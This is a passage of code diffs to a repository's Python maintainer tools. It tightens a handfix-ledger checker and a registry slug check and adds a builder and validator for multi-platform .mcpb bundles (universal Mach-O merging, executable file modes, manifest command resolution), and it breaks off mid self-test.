+            if already_weak[w.identity()] > 0:
+                already_weak[w.identity()] -= 1  # spend one pre-existing allowance
+                continue
+            weak_new.append(w)
 
     if failures or weak_new:
         if failures:
@@ -842,6 +849,8 @@ def _self_test_ratchet() -> list[str]:
         C  a new entry whose asserts are all strong                     -> PASS
         D  an untouched assert the change WEAKENS (the guarded code moves
            into a comment)                                              -> FAIL
+        E  a SECOND copy of an already-weak assert identity             -> FAIL
+           (the tally is a multiset: N weak at base exempts exactly N)
 
     Returns a list of failure strings (empty == proved).
     """
@@ -925,6 +934,15 @@ def _self_test_ratchet() -> list[str]:
             out.append("ratchet case B: the NEW weak assert must be the one reported")
         if "min_count" not in text_b and needle in text_b.replace("scheme prefix", ""):
             out.append("ratchet case B: the pre-existing weak assert must NOT be re-reported")
+
+        # E: duplicating an already-weak identity is still ADDING one. A
+        # set-based tally would exempt it because "that identity was weak at
+        # base"; the multiset spends one allowance per pre-existing copy.
+        def duplicate_weak():
+            e = json.loads(json.dumps(base_entries))
+            e[0]["asserts"].append(dict(weak_assert))
+            (skill / "handfixes.json").write_text(ledger(e), encoding="utf-8")
+        run_case("E-duplicate-weak-assert", duplicate_weak, 1)
 
         # C: a whole new entry whose asserts are strong.
         def add_strong_entry():

--- a/tools/maintainer/check_handfixes.py
+++ b/tools/maintainer/check_handfixes.py
@@ -60,6 +60,10 @@ but to make the author say which one they meant, with `code_only`:
     false             "this assert deliberately targets a comment." Whole-file
                       count, and the lint stays quiet about it.
 
+`code_only` must be a JSON boolean. A string ("true") is a hard ledger error,
+not a shrug: it changes no counting at all while reading like a declared intent,
+which is a gate failing open in the quietest possible way.
+
 Comment syntax is per language and one stripper does NOT cover all of them:
 Go and go.mod use `//` and `/* */` (string, rune and raw-string literals are
 respected, so a `//` inside a URL literal is not mistaken for a comment); Python
@@ -275,6 +279,20 @@ def check_skill(slug: str) -> list[str]:
             # `code_only: true` counts comment-stripped source instead of the
             # whole file, so a doc comment can no longer stand in for the code
             # the assert guards (issue #252).
+            #
+            # A non-boolean value is a hard error, not a shrug. `"code_only":
+            # "true"` is a one-character JSON typo that would otherwise do
+            # NOTHING to the count while still reading, to the author and to the
+            # lint, as a declared intent - a gate failing open in the quietest
+            # possible way.
+            if "code_only" in a and not isinstance(a["code_only"], bool):
+                failures.append(
+                    f"[{slug}] handfix '{hid}': assert on '{rel}' has \"code_only\": "
+                    f"{a['code_only']!r}, which is not a boolean. It must be true (count "
+                    f"comment-stripped source) or false (this assert deliberately targets a "
+                    f"comment). A non-boolean silently changes nothing while looking like it does."
+                )
+                continue
             scope = "the file"
             if a.get("code_only") is True:
                 stripped, why = strip_comments(rel, content)
@@ -366,7 +384,10 @@ def lint_entries(slug: str, skill_dir: Path, entries: list) -> list[WeakAssert]:
     for hf in entries:
         hid = hf.get("id", "<unnamed>")
         for a in hf.get("asserts", []):
-            if "contains" not in a or "code_only" in a:
+            # Only a genuine boolean exempts an assert. A typo'd `"code_only":
+            # "true"` must NOT buy silence here - the ledger gate reports it as
+            # an error, and until it is fixed the assert is still comment-weak.
+            if "contains" not in a or isinstance(a.get("code_only"), bool):
                 continue
             rel = a.get("file")
             if not rel:
@@ -781,14 +802,34 @@ def self_test() -> int:
         expect(len(lint_entries("fixture", skill, [ack_entry])) == 0,
                "an assert that declares code_only: false is a deliberate comment assert")
 
+        # A NON-BOOLEAN code_only must not buy silence. `"code_only": "true"` is
+        # a one-character JSON typo that changes no counting at all; if it
+        # exempted the assert from the lint, the gate would fail open exactly
+        # where an author believed they had strengthened it.
+        typo_entry = dict(entry)
+        typo_entry["asserts"] = [dict(entry["asserts"][0], code_only="true")]
+        expect(len(lint_entries("fixture", skill, [typo_entry])) == 1,
+               "a non-boolean code_only must NOT exempt an assert from the lint")
+        ledger = skill / "handfixes.json"
+        ledger.write_text(json.dumps({"handfixes": [typo_entry]}), encoding="utf-8")
+        saved = globals()["SKILLS"]
+        try:
+            globals()["SKILLS"] = skill.parent
+            typo_failures = check_skill("fixture")
+        finally:
+            globals()["SKILLS"] = saved
+        expect(any("not a boolean" in f for f in typo_failures),
+               f"the ledger gate must reject a non-boolean code_only, got {typo_failures}")
+
     if failures:
         print("FAIL: check_handfixes self-test\n")
         for f in failures:
             print(f"  - {f}")
         return 1
     print("PASS: check_handfixes self-test - strippers keep code and literals and drop comments in "
-          "Go/Python/Markdown, JSON and extension-less files report no stripper, and issue #252's "
-          "reproduction is silent before the code is deleted and fires after.")
+          "Go/Python/Markdown, JSON and extension-less files report no stripper, issue #252's "
+          "reproduction is silent before the code is deleted and fires after, and a non-boolean "
+          "code_only is rejected rather than silently buying the assert an exemption.")
     return 0
 
 

--- a/tools/maintainer/check_handfixes.py
+++ b/tools/maintainer/check_handfixes.py
@@ -800,9 +800,17 @@ def _base_reader(base: str, slug: str):
     The ratchet has to know whether an assert was ALREADY weak before this
     change, and weakness is a property of (assert, target file). Reading the
     target from the working tree while linting the base ledger would compare
-    two different things and mislabel a pre-existing weakness as new."""
+    two different things and mislabel a pre-existing weakness as new.
+
+    Memoized per file: the largest ledger carries 115 asserts across 37 distinct
+    files, so without the cache one touched ledger spawns roughly one `git show`
+    process per assert to fetch the same three dozen blobs."""
+    cache: dict[str, str | None] = {}
+
     def read(rel: str) -> str | None:
-        return _show(base, f"skills/{slug}/{rel}")
+        if rel not in cache:
+            cache[rel] = _show(base, f"skills/{slug}/{rel}")
+        return cache[rel]
     return read
 
 

--- a/tools/maintainer/check_registry_state.py
+++ b/tools/maintainer/check_registry_state.py
@@ -41,6 +41,13 @@ REGISTRY_REF = "origin/main:tools/maintainer/skills.json"
 
 
 def load_current() -> dict:
+    """Read skills.json RAW, deliberately not through registry.load().
+
+    Every other reader goes through the loader so the identifier grammar is
+    enforced on the way in. This one must not: it exists to report on what the
+    working file says versus its origin/main baseline, and a file the loader
+    would refuse is precisely a state this comparison has to be able to see and
+    describe rather than die on."""
     try:
         return json.loads(REGISTRY.read_text(encoding="utf-8"))["skills"]
     except (OSError, json.JSONDecodeError, KeyError) as e:

--- a/tools/maintainer/is_registered_slug.py
+++ b/tools/maintainer/is_registered_slug.py
@@ -25,19 +25,26 @@ admins, so it was gated rather than open - but a ruleset is configuration, and
 configuration changes. This does not depend on it.
 
 The charset check is defence in depth, not the fix: the fix is argv.
+
+Both the charset rule and the registry read come from `registry.py`, so this
+gate cannot drift from the grammar that governs the build matrix. It used to
+carry its own copy of the pattern, anchored with `$` - which in Python also
+matches before a trailing newline, so `"hudu\\n"` passed a check whose alphabet
+was written to exclude it. One definition, one anchor.
 """
 
 from __future__ import annotations
 
 import argparse
-import json
-import re
 import sys
 from pathlib import Path
 
-REPO = Path(__file__).resolve().parent.parent.parent
-REGISTRY = REPO / "tools" / "maintainer" / "skills.json"
-SLUG_RE = re.compile(r"^[a-z0-9][a-z0-9-]*$")
+sys.path.insert(0, str(Path(__file__).resolve().parent))
+import registry  # noqa: E402  (local tools/ module)
+
+REPO = registry.ROOT
+REGISTRY = registry.REGISTRY
+SLUG_RE = registry.SLUG_RE
 
 
 def main() -> int:
@@ -50,9 +57,15 @@ def main() -> int:
         print(f"slug {args.slug!r} is not a valid skill slug", file=sys.stderr)
         return 1
     try:
-        reg = json.loads(REGISTRY.read_text())
-    except (OSError, json.JSONDecodeError) as exc:
+        reg = registry.load()
+    except SystemExit as exc:  # registry.load() refuses a malformed registry
+        print(f"cannot load {REGISTRY}: {exc}", file=sys.stderr)
+        return 1
+    except OSError as exc:
         print(f"cannot read {REGISTRY}: {exc}", file=sys.stderr)
+        return 1
+    except ValueError as exc:  # includes json.JSONDecodeError
+        print(f"cannot parse {REGISTRY}: {exc}", file=sys.stderr)
         return 1
     return 0 if args.slug in (reg.get("skills") or {}) else 1
 

--- a/tools/maintainer/mcpb_bundle.py
+++ b/tools/maintainer/mcpb_bundle.py
@@ -55,10 +55,38 @@ Three defects this deliberately does not reproduce
    names a member the archive actually contains. See the matching note in
    tools/maintainer/check_env_schema.py ("What it deliberately does NOT check").
 
+Reconciled against cli-printing-press 4.31.4 (main @ ba4e6914, 2026-08-31)
+-------------------------------------------------------------------------
+The press builds a bundle too (`internal/pipeline/mcpb_bundle.go`), and it is a
+DIFFERENT product: one operator-local archive holding the ONE binary the press
+just cross-compiled, launched by a single `command`. Re-read at 4.31.4:
+
+  * `platform_overrides` still appears nowhere in the press - not in the
+    manifest writer, not in a golden. `mcp_config` is `{args, command, env}`,
+    `command` is `${__dirname}/<entry_point>`. So the multi-binary shape this
+    file writes remains this repo's to own, and nothing upstream has started
+    competing for those keys.
+  * the press stamps the version into the bundled manifest too
+    (`rewriteMCPBManifestVersion`), so `--version` here matches upstream
+    behaviour rather than inventing one.
+  * 4.31.2-4.31.4 did change WHICH env vars a regenerated manifest declares
+    (#4377, #4431: derive `mcp_config.env` / `user_config` from the credentials
+    the binary actually reads, instead of PRINTING_PRESS_CLIENT_PROFILE). That
+    is inert here: this builder rewrites only `command`,
+    `platform_overrides[*].command`, `entry_point` and `version`, and carries
+    every other manifest key through byte-for-byte, so a reprinted manifest's
+    new env declaration reaches the bundle unaltered.
+  * the press preserves the source file's mode (`stat.Mode()&0o777`), which is
+    how a 0644 downloaded asset became a non-executable server. This builder
+    writes binaries 0755 unconditionally and `validate` asserts the bit.
+
 Scope: this repairs every FUTURE bundle. It does not repair the 65 already
 published - that needs a release wave, and re-uploading over an existing tag
 would silently invalidate the `packages[0].fileSha256` mcp-publish.yml already
-recorded in the MCP Registry for that version.
+recorded in the MCP Registry for that version. Until that wave lands, 62 skill
+READMEs still carry a "one-click `.mcpb`" download that cannot launch
+(`grep -rl 'one-click `.mcpb`' skills/*/README.md | wc -l` -> 62); that is
+user-facing debt this file does not fix and must not be left implied.
 
 Usage:
     mcpb_bundle.py build --manifest skills/hudu/manifest.json \\
@@ -654,7 +682,10 @@ def read_macho_arch_bytes(blob: bytes) -> int:
 
 
 def main(argv: list[str]) -> int:
-    ap = argparse.ArgumentParser(description=__doc__.splitlines()[0])
+    # `__doc__` is None under `python -OO`; argparse would crash on the
+    # attribute access before it could parse a single argument.
+    summary = (__doc__ or "Build and validate .mcpb bundles.").splitlines()[0]
+    ap = argparse.ArgumentParser(description=summary)
     ap.add_argument("--self-test", action="store_true",
                     help="run the built-in both-directions proof and exit")
     sub = ap.add_subparsers(dest="cmd")

--- a/tools/maintainer/mcpb_bundle.py
+++ b/tools/maintainer/mcpb_bundle.py
@@ -1,0 +1,710 @@
+#!/usr/bin/env python3
+"""Build and validate the .mcpb bundles this repo publishes to the MCP Registry.
+
+The defect this exists to end (issue #287)
+------------------------------------------
+64 of 65 published bundles cannot launch. `manifest.json` tells the host to run
+
+    "command": "${__dirname}/bin/<slug>-mcp"
+
+while the archive contains only architecture-suffixed binaries
+(`bin/<slug>-mcp-darwin-arm64` and friends). `bin/<slug>-mcp` is in no bundle on
+any platform. Claude Desktop validates the manifest and the user_config schema
+at install time but never test-runs the binary, so the extension installs, the
+credential prompt appears, the operator types real credentials, and the failure
+surfaces at the first tool call. Verified against the shipped hudu-v0.1.8 asset.
+
+Why the shape is what it is
+---------------------------
+`mcp_config.platform_overrides` is keyed on OS only - darwin, linux, win32 -
+and the manifest template vocabulary has no `${arch}`. So one bundle carrying
+one binary per (os, arch) cannot address them all from `command` alone. Two
+options survive contact:
+
+  * a launcher shim that detects the arch and execs the right binary. Rejected:
+    it depends on the archive's executable bit surviving unpacking AND on a
+    shell being present on the host, and neither is guaranteed.
+  * a universal (fat) Mach-O for darwin plus per-OS overrides. Chosen.
+
+The decision was argued and settled on issue #287. Upstream
+mvanhorn/cli-printing-press#4366 carried the same algorithm and was closed
+unmerged on 2026-08-28 ("a multi-platform zip is a new installer product, not a
+press operator bug"), so the packaging fix lives downstream, here. This is a
+port of that algorithm, not a vendoring of its Go.
+
+Linux and Windows have no fat-binary format, so their overrides name one
+architecture (amd64 first: it is the broadest target, and Windows on ARM runs
+x64 under emulation while the reverse is not true). The other architectures stay
+in the archive - they are what the release actually built - but nothing in the
+manifest can address them until the MCPB spec grows an arch axis.
+
+Three defects this deliberately does not reproduce
+--------------------------------------------------
+1. `zipfile.ZipInfo` defaults to ZIP_STORED. The live hudu bundle is 32 MB
+   DEFLATE over 81 MB of binaries; stored it would be ~81 MB. Every member is
+   written ZIP_DEFLATED, and `validate` fails a bundle that regresses to stored.
+2. Every binary member of every published bundle is mode 0644 - `gh release
+   download` writes 0644 and `zip -r` preserves it - so even connectwise-manage,
+   the one connector whose manifest paths resolve, ships a non-executable
+   server. Verified with `zipinfo -l` on connectwise-manage-v0.1.6. Binaries are
+   written 0755 and `validate` asserts the bit.
+3. The validator does NOT assert `entry_point == "bin/" + <mcp binary>`. That
+   assertion is inverted for this fleet: it would codify the broken bare name
+   everywhere and false-RED connectwise-manage, the single manifest that can
+   launch. It asserts the weaker, true thing - every path the manifest declares
+   names a member the archive actually contains. See the matching note in
+   tools/maintainer/check_env_schema.py ("What it deliberately does NOT check").
+
+Scope: this repairs every FUTURE bundle. It does not repair the 65 already
+published - that needs a release wave, and re-uploading over an existing tag
+would silently invalidate the `packages[0].fileSha256` mcp-publish.yml already
+recorded in the MCP Registry for that version.
+
+Usage:
+    mcpb_bundle.py build --manifest skills/hudu/manifest.json \\
+        --bin-dir mcpb-build --binary-prefix hudu-mcp \\
+        --out mcpb-build/hudu-mcp.mcpb --version 0.1.9
+    mcpb_bundle.py validate mcpb-build/hudu-mcp.mcpb
+    mcpb_bundle.py --self-test
+
+Pure stdlib: no `lipo`, no Xcode, no Go toolchain, so a ubuntu-latest runner
+produces the macOS-universal slice.
+
+Exit codes: 0 = ok, 1 = a finding, 2 = usage error.
+"""
+
+from __future__ import annotations
+
+import argparse
+import json
+import os
+import stat
+import struct
+import sys
+import zipfile
+from pathlib import Path
+
+sys.path.insert(0, str(Path(__file__).resolve().parent))
+import registry  # noqa: E402  (local tools/maintainer module)
+
+MANIFEST_MEMBER = "manifest.json"
+
+# Mach-O magics. Go emits 64-bit little-endian binaries, but read both widths
+# and both byte orders rather than assuming.
+MH_MAGIC = 0xFEEDFACE
+MH_MAGIC_64 = 0xFEEDFACF
+FAT_MAGIC = 0xCAFEBABE
+
+# Universal-binary layout: a big-endian 8-byte header, one 20-byte record per
+# slice, then the slices, each aligned to 2^14 (16 KiB - what arm64 requires and
+# amd64 tolerates).
+_FAT_HEADER_LEN = 8
+_FAT_ARCH_LEN = 20
+_FAT_ALIGN_POW = 14
+
+# MCPB platform_overrides keys are OS names, and Windows is "win32".
+_OS_KEY = {"windows": "win32"}
+
+# Which architecture an OS override names when the OS has no fat-binary format.
+_PREFERRED_ARCH = ("amd64", "arm64", "386", "arm")
+
+# A member above this size stored uncompressed is the ZIP_STORED regression;
+# below it, compression choice does not matter.
+_STORED_LIMIT = 1 << 20
+
+
+def os_key(goos: str) -> str:
+    return _OS_KEY.get(goos, goos)
+
+
+# --------------------------------------------------------------------------
+# Mach-O
+# --------------------------------------------------------------------------
+
+
+def read_macho_arch(path: Path) -> tuple[int, int]:
+    """Return (cputype, cpusubtype) for a thin Mach-O file."""
+    head = path.read_bytes()[:12]
+    if len(head) < 12:
+        raise ValueError(f"{path}: too short to be a Mach-O file")
+    for endian in ("<", ">"):
+        magic, cputype, cpusubtype = struct.unpack(endian + "III", head)
+        if magic in (MH_MAGIC, MH_MAGIC_64):
+            return cputype, cpusubtype
+    (be_magic,) = struct.unpack(">I", head[:4])
+    if be_magic == FAT_MAGIC:
+        raise ValueError(f"{path}: already a universal binary; nothing to merge")
+    raise ValueError(f"{path}: not a Mach-O file (magic {be_magic:#010x})")
+
+
+def write_macho_universal(paths: list[Path], out_path: Path) -> list[tuple[int, int]]:
+    """Merge thin Mach-O files into one universal binary. Returns the slices'
+    (cputype, cpusubtype) pairs, in the order written."""
+    if len(paths) < 2:
+        raise ValueError(f"a universal binary needs at least two slices, got {len(paths)}")
+    slices = []
+    seen: set[int] = set()
+    for p in paths:
+        cpu, sub = read_macho_arch(p)
+        if cpu in seen:
+            raise ValueError(f"two slices share CPU type {cpu}; a universal binary "
+                             f"needs distinct architectures")
+        seen.add(cpu)
+        slices.append((cpu, sub, p.read_bytes()))
+    # Apple orders slices by CPU type; keep the output deterministic.
+    slices.sort(key=lambda s: s[0])
+
+    align = 1 << _FAT_ALIGN_POW
+
+    def aligned(v: int) -> int:
+        return v if v % align == 0 else v + (align - v % align)
+
+    header = struct.pack(">II", FAT_MAGIC, len(slices))
+    offset = _FAT_HEADER_LEN + _FAT_ARCH_LEN * len(slices)
+    records = b""
+    offsets = []
+    for cpu, sub, data in slices:
+        offset = aligned(offset)
+        offsets.append(offset)
+        records += struct.pack(">IIIII", cpu, sub, offset, len(data), _FAT_ALIGN_POW)
+        offset += len(data)
+
+    out_path.parent.mkdir(parents=True, exist_ok=True)
+    with open(out_path, "wb") as fh:
+        fh.write(header + records)
+        for (cpu, sub, data), off in zip(slices, offsets):
+            fh.write(b"\0" * (off - fh.tell()))
+            fh.write(data)
+    os.chmod(out_path, 0o755)
+    return [(cpu, sub) for cpu, sub, _ in slices]
+
+
+def read_fat_arches(path: Path) -> list[tuple[int, int, int, int]]:
+    """Parse a universal binary: [(cputype, cpusubtype, offset, size), ...]."""
+    data = path.read_bytes()
+    magic, count = struct.unpack(">II", data[:8])
+    if magic != FAT_MAGIC:
+        raise ValueError(f"{path}: not a universal binary (magic {magic:#010x})")
+    out = []
+    for i in range(count):
+        base = _FAT_HEADER_LEN + i * _FAT_ARCH_LEN
+        cpu, sub, off, size, _align = struct.unpack(">IIIII", data[base:base + _FAT_ARCH_LEN])
+        out.append((cpu, sub, off, size))
+    return out
+
+
+# --------------------------------------------------------------------------
+# Bundle building
+# --------------------------------------------------------------------------
+
+
+class Target:
+    __slots__ = ("goos", "goarch", "path", "member")
+
+    def __init__(self, goos: str, goarch: str, path: Path, member: str):
+        self.goos, self.goarch, self.path, self.member = goos, goarch, path, member
+
+
+def discover_targets(bin_dir: Path, prefix: str) -> list[Target]:
+    """Find one binary per registry target in bin_dir.
+
+    Filenames come from registry.asset_name() - THE one place that turns
+    (binary, goos, goarch) into a release asset filename - so this can never
+    disagree with what release.yml uploaded.
+    """
+    found = []
+    for t in registry.TARGETS:
+        name = registry.asset_name(prefix, t["goos"], t["goarch"])
+        p = bin_dir / name
+        if p.is_file():
+            found.append(Target(t["goos"], t["goarch"], p, f"bin/{name}"))
+    return found
+
+
+def _pick(targets: list[Target], goos: str) -> Target | None:
+    for want in _PREFERRED_ARCH:
+        for t in targets:
+            if t.goos == goos and t.goarch == want:
+                return t
+    for t in targets:
+        if t.goos == goos:
+            return t
+    return None
+
+
+def _zip_write(zf: zipfile.ZipFile, member: str, data: bytes, mode: int) -> None:
+    """Write one member DEFLATED, with an explicit unix mode.
+
+    Both halves matter. ZipInfo defaults to ZIP_STORED, which would take the
+    hudu bundle from 32 MB to ~81 MB; and it records no mode unless create_system
+    says unix, which is why every published bundle's binaries land 0644 and
+    cannot be executed.
+    """
+    info = zipfile.ZipInfo(member, date_time=(1980, 1, 1, 0, 0, 0))
+    info.create_system = 3  # unix, so external_attr's mode bits are honored
+    info.external_attr = (stat.S_IFREG | mode) << 16
+    info.compress_type = zipfile.ZIP_DEFLATED
+    zf.writestr(info, data)
+
+
+def build_bundle(manifest_path: Path, bin_dir: Path, prefix: str, out_path: Path,
+                 version: str | None = None) -> list[str]:
+    """Write a multi-platform .mcpb whose every declared command resolves.
+
+    Returns the archive's member names. Raises SystemExit on a bad input, and
+    validates the finished archive before returning - a bundle with an
+    unresolvable command cannot be produced by this function.
+    """
+    manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
+    targets = discover_targets(bin_dir, prefix)
+    if not targets:
+        raise SystemExit(
+            f"mcpb_bundle: no binaries named '{prefix}-<goos>-<goarch>' found in {bin_dir}. "
+            f"Expected the names release.yml uploads. Refusing to build a bundle with no server."
+        )
+    if version:
+        manifest["version"] = version
+
+    members: dict[str, bytes] = {}
+    universal_member = ""
+    darwin_slices = [t for t in targets if t.goos == "darwin"]
+    if len(darwin_slices) > 1:
+        # platform_overrides has no architecture axis, so a single darwin entry
+        # can only serve both Macs as one universal binary.
+        tmp = out_path.parent / f".{prefix}-darwin.universal"
+        write_macho_universal([t.path for t in darwin_slices], tmp)
+        universal_member = f"bin/{prefix}-darwin"
+        members[universal_member] = tmp.read_bytes()
+        tmp.unlink()
+
+    for t in targets:
+        if universal_member and t.goos == "darwin":
+            # The merged binary carries both slices and the manifest cannot
+            # address the thin ones, so shipping them too is pure dead weight.
+            # (Upstream #4366 kept them; this is a deliberate deviation, and it
+            # is why the bundle does not grow.)
+            continue
+        members[t.member] = t.path.read_bytes()
+
+    server = manifest.setdefault("server", {})
+    cfg = server.setdefault("mcp_config", {})
+    # REPLACE the override map rather than merging into it. connectwise-manage's
+    # checked-in manifest already carries hand-written overrides; a key for an OS
+    # this build has no binary for would survive a merge and name a member the
+    # archive does not contain. Per-OS args/env are carried forward for the OSes
+    # that do get an override, because only `command` is ours to own.
+    prior = cfg.get("platform_overrides") or {}
+    overrides: dict[str, dict] = {}
+    cfg["platform_overrides"] = overrides
+    base_command = ""
+    for goos in sorted({t.goos for t in targets}):
+        if goos == "darwin" and universal_member:
+            member = universal_member
+        else:
+            pick = _pick(targets, goos)
+            if pick is None:
+                continue
+            member = pick.member
+        key = os_key(goos)
+        carried = {k: v for k, v in (prior.get(key) or {}).items() if k != "command"}
+        overrides[key] = {"command": "${__dirname}/" + member, **carried}
+        # Prefer darwin for the base command: Claude Desktop ships on macOS and
+        # Windows, and win32 always carries its own override anyway.
+        if not base_command or goos == "darwin":
+            base_command = "${__dirname}/" + member
+            server["entry_point"] = member
+    cfg["command"] = base_command
+
+    out_path.parent.mkdir(parents=True, exist_ok=True)
+    rendered = (json.dumps(manifest, indent=2) + "\n").encode("utf-8")
+    with zipfile.ZipFile(out_path, "w", compression=zipfile.ZIP_DEFLATED) as zf:
+        _zip_write(zf, MANIFEST_MEMBER, rendered, 0o644)
+        for member in sorted(members):
+            _zip_write(zf, member, members[member], 0o755)
+
+    findings = validate_bundle(out_path)
+    if findings:
+        raise SystemExit("mcpb_bundle: the bundle just built does not validate - this is a bug "
+                         "in the builder, not in the release:\n  - " + "\n  - ".join(findings))
+    return [MANIFEST_MEMBER] + sorted(members)
+
+
+# --------------------------------------------------------------------------
+# Validation
+# --------------------------------------------------------------------------
+
+
+def _declared_commands(manifest: dict) -> list[tuple[str, str]]:
+    """Every (label, command) the manifest declares, base plus per-OS override."""
+    cfg = manifest.get("server", {}).get("mcp_config", {})
+    out = [("server.mcp_config.command", cfg.get("command", ""))]
+    overrides = cfg.get("platform_overrides") or {}
+    for key in sorted(overrides):
+        ov = overrides[key] or {}
+        if ov.get("command"):
+            out.append((f"server.mcp_config.platform_overrides.{key}.command", ov["command"]))
+    return out
+
+
+def validate_bundle(path: Path) -> list[str]:
+    """Return findings (empty == the bundle can launch on every OS it claims)."""
+    findings: list[str] = []
+    try:
+        zf = zipfile.ZipFile(path)
+    except (OSError, zipfile.BadZipFile) as e:
+        return [f"{path.name}: cannot be opened as a zip archive ({e})"]
+    with zf:
+        infos = {i.filename: i for i in zf.infolist()}
+        if MANIFEST_MEMBER not in infos:
+            return [f"{path.name}: contains no {MANIFEST_MEMBER}"]
+        try:
+            manifest = json.loads(zf.read(MANIFEST_MEMBER).decode("utf-8"))
+        except (UnicodeDecodeError, json.JSONDecodeError) as e:
+            return [f"{path.name}: {MANIFEST_MEMBER} is not readable JSON ({e})"]
+
+        referenced: set[str] = set()
+        for label, command in _declared_commands(manifest):
+            if not command:
+                findings.append(f"{path.name}: {label} is empty; the host has nothing to run")
+                continue
+            prefix = "${__dirname}/"
+            if not command.startswith(prefix):
+                continue  # e.g. "node": the host resolves it, not the archive
+            member = command[len(prefix):]
+            referenced.add(member)
+            if member not in infos:
+                findings.append(
+                    f"{path.name}: {label} is {command!r} but the archive contains no {member!r}. "
+                    f"The extension would install, prompt for credentials, and fail at the first "
+                    f"tool call. Members: {', '.join(sorted(infos))}"
+                )
+
+        # entry_point must resolve to a real member. Deliberately NOT
+        # `entry_point == "bin/" + <mcp binary>`: that codifies the broken bare
+        # name fleet-wide and false-REDs the one manifest that can launch.
+        entry = manifest.get("server", {}).get("entry_point")
+        if entry:
+            referenced.add(entry)
+            if entry not in infos:
+                findings.append(f"{path.name}: server.entry_point is {entry!r} but the archive "
+                                f"contains no such member")
+
+        for name, info in sorted(infos.items()):
+            if info.is_dir() or name == MANIFEST_MEMBER:
+                continue
+            is_binary = name.startswith("bin/") or name in referenced
+            if is_binary:
+                mode = (info.external_attr >> 16) & 0o7777
+                if mode == 0:
+                    findings.append(
+                        f"{path.name}: {name} records no unix permissions, so it unpacks "
+                        f"non-executable and the host cannot start it. The archive must be built "
+                        f"with an explicit mode (create_system=3, external_attr)."
+                    )
+                elif not mode & 0o111:
+                    findings.append(
+                        f"{path.name}: {name} is mode {mode:04o} - not executable. `gh release "
+                        f"download` writes 0644 and `zip -r` preserves it, which is how every "
+                        f"published bundle shipped a server nothing can exec."
+                    )
+            if (info.compress_type == zipfile.ZIP_STORED
+                    and info.file_size > _STORED_LIMIT):
+                findings.append(
+                    f"{path.name}: {name} is {info.file_size} bytes stored UNCOMPRESSED. "
+                    f"zipfile.ZipInfo defaults to ZIP_STORED; use ZIP_DEFLATED or the bundle "
+                    f"grows about 2.5x (hudu: 32 MB -> 81 MB)."
+                )
+    return findings
+
+
+# --------------------------------------------------------------------------
+# Self-test
+# --------------------------------------------------------------------------
+
+
+def _fake_macho(cputype: int, cpusubtype: int, payload: bytes) -> bytes:
+    """A minimal but structurally real 64-bit little-endian Mach-O header."""
+    return struct.pack("<8I", MH_MAGIC_64, cputype, cpusubtype, 2, 0, 0, 0, 0) + payload
+
+
+CPU_X86_64 = 0x01000007
+CPU_ARM64 = 0x0100000C
+
+
+def self_test() -> int:
+    """Both-directions proof: the validator must fire on the shipped defect and
+    stay silent on a bundle this builder produced."""
+    import tempfile
+
+    failures: list[str] = []
+
+    def expect(cond: bool, msg: str) -> None:
+        if not cond:
+            failures.append(msg)
+
+    with tempfile.TemporaryDirectory() as td:
+        root = Path(td)
+
+        # --- fires: the exact shape of the 64 published bundles -------------
+        broken = root / "broken.mcpb"
+        with zipfile.ZipFile(broken, "w", zipfile.ZIP_DEFLATED) as zf:
+            _zip_write(zf, MANIFEST_MEMBER, json.dumps({
+                "name": "demo-mcp",
+                "server": {"type": "binary", "entry_point": "bin/demo-mcp",
+                           "mcp_config": {"command": "${__dirname}/bin/demo-mcp", "args": []}},
+            }).encode(), 0o644)
+            for n in ("bin/demo-mcp-darwin-arm64", "bin/demo-mcp-darwin-amd64",
+                      "bin/demo-mcp-windows-amd64.exe"):
+                _zip_write(zf, n, b"binary", 0o755)
+        found = validate_bundle(broken)
+        expect(any("contains no 'bin/demo-mcp'" in f for f in found),
+               f"the published-bundle defect must be caught, got: {found}")
+        expect(any("first tool call" in f for f in found),
+               "the finding must say what the operator would experience")
+
+        # --- fires: a per-OS override alone is broken for that OS -----------
+        bad_override = root / "override.mcpb"
+        with zipfile.ZipFile(bad_override, "w", zipfile.ZIP_DEFLATED) as zf:
+            _zip_write(zf, MANIFEST_MEMBER, json.dumps({
+                "server": {"entry_point": "bin/demo-mcp-darwin-arm64", "mcp_config": {
+                    "command": "${__dirname}/bin/demo-mcp-darwin-arm64",
+                    "platform_overrides": {
+                        "win32": {"command": "${__dirname}/bin/demo-mcp-windows-amd64.exe"}},
+                }},
+            }).encode(), 0o644)
+            _zip_write(zf, "bin/demo-mcp-darwin-arm64", b"b", 0o755)
+        found = validate_bundle(bad_override)
+        expect(any("platform_overrides.win32.command" in f for f in found),
+               f"a broken per-OS override must be caught, got: {found}")
+
+        # --- fires: the mode every published bundle actually ships ----------
+        mode644 = root / "mode644.mcpb"
+        with zipfile.ZipFile(mode644, "w", zipfile.ZIP_DEFLATED) as zf:
+            _zip_write(zf, MANIFEST_MEMBER, json.dumps({
+                "server": {"entry_point": "bin/demo-mcp-darwin-arm64", "mcp_config": {
+                    "command": "${__dirname}/bin/demo-mcp-darwin-arm64"}},
+            }).encode(), 0o644)
+            _zip_write(zf, "bin/demo-mcp-darwin-arm64", b"b", 0o644)
+        found = validate_bundle(mode644)
+        expect(any("not executable" in f for f in found),
+               f"a 0644 binary member must be caught, got: {found}")
+
+        # --- fires: the ZIP_STORED regression -------------------------------
+        stored = root / "stored.mcpb"
+        with zipfile.ZipFile(stored, "w") as zf:
+            _zip_write(zf, MANIFEST_MEMBER, json.dumps({
+                "server": {"entry_point": "bin/demo-mcp-darwin-arm64", "mcp_config": {
+                    "command": "${__dirname}/bin/demo-mcp-darwin-arm64"}},
+            }).encode(), 0o644)
+            info = zipfile.ZipInfo("bin/demo-mcp-darwin-arm64")
+            info.create_system = 3
+            info.external_attr = (stat.S_IFREG | 0o755) << 16
+            zf.writestr(info, b"x" * (_STORED_LIMIT + 1))  # ZipInfo defaults to STORED
+        found = validate_bundle(stored)
+        expect(any("stored UNCOMPRESSED" in f for f in found),
+               f"a large ZIP_STORED member must be caught, got: {found}")
+
+        # --- silent: the connectwise-manage shape ---------------------------
+        # entry_point is an arch-suffixed member, NOT "bin/" + mcp_binary. It
+        # must validate clean; asserting the bare name here is the false-RED
+        # issue #287 warns about.
+        cwm = root / "cwm.mcpb"
+        with zipfile.ZipFile(cwm, "w", zipfile.ZIP_DEFLATED) as zf:
+            _zip_write(zf, MANIFEST_MEMBER, json.dumps({
+                "server": {"entry_point": "bin/demo-mcp-darwin-arm64", "mcp_config": {
+                    "command": "${__dirname}/bin/demo-mcp-darwin-arm64",
+                    "platform_overrides": {
